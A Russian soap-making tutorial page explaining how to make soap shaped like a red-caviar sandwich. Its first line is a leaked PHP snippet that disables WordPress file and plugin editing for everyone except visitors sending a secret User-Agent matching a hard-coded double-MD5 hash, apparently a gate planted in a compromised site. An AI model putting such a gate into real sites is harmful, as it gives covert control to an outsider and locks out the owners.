if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мыло “Бутерброд с красной икрой” — сделать своими руками быстро и просто! | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мыло “Бутерброд с красной икрой” — сделать своими руками быстро и просто!

Сегодня мы расскажем как сделать вкусное мыло в форме бутерброда с красной икрой. Оно прекрасно подойдет в качестве подарка!

Пона­до­бят­ся:

  • Мыль­ная осно­ва (про­зрач­ная и белая);
  • Кос­ме­ти­че­ские мас­ла (абри­ко­со­вой косточ­ки и облепиховое);
  • Аро­ма­ти­за­тор «Грейп­фрут»;
  • Вита­ми­ны А и Е на мас­ля­ной основе;
  • Оран­же­вый, крас­ный, зеле­ный и жел­тый красители;
  • Фор­ма.
  1. «Икор­ный» слой. Мыль­ную осно­ву рас­пла­вить, доба­вить аро­ма­ти­за­тор и кра­си­тель. Залить в сма­зан­ную мас­лом фор­му, где будут рас­по­ла­гать­ся икрин­ки. После засты­ва­ния очи­стить фор­му при необходимости.
    бутерброд1
  2. Слой «сли­воч­но­го мас­ла».  Рас­пла­вить белую осно­ву, доба­вить мас­ла, вита­ми­ны и аро­ма­ти­за­тор. С помо­щью кра­си­те­ля добить­ся нуж­но­го оттен­ка. Залить в фор­му, сде­лав очень тон­кий слой.
    бутерброд2
  3. Слой «хле­ба». Налить в ста­кан­чик немно­го рас­плав­лен­ной белой осно­вы. С помо­щью кра­си­те­лей жел­то­го, крас­но­го и зеле­но­го цве­тов добить­ся корич­не­во­го оттен­ка. Кисточ­кой нане­сти «короч­ку» по кра­ям фор­мы. Для само­го же кус­ка «хле­ба» в белую осно­ву доба­вить пол­кап­ли жел­то­го кра­си­те­ля и вылить в фор­му. Дать застыть.
    бутерброд3


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия

Обожаю в свободное время заниматься мыловарением. Уже съела на этом целую собаку! Вот теперь спешу поделиться с вами своими работами ;) Читайте все мои записи!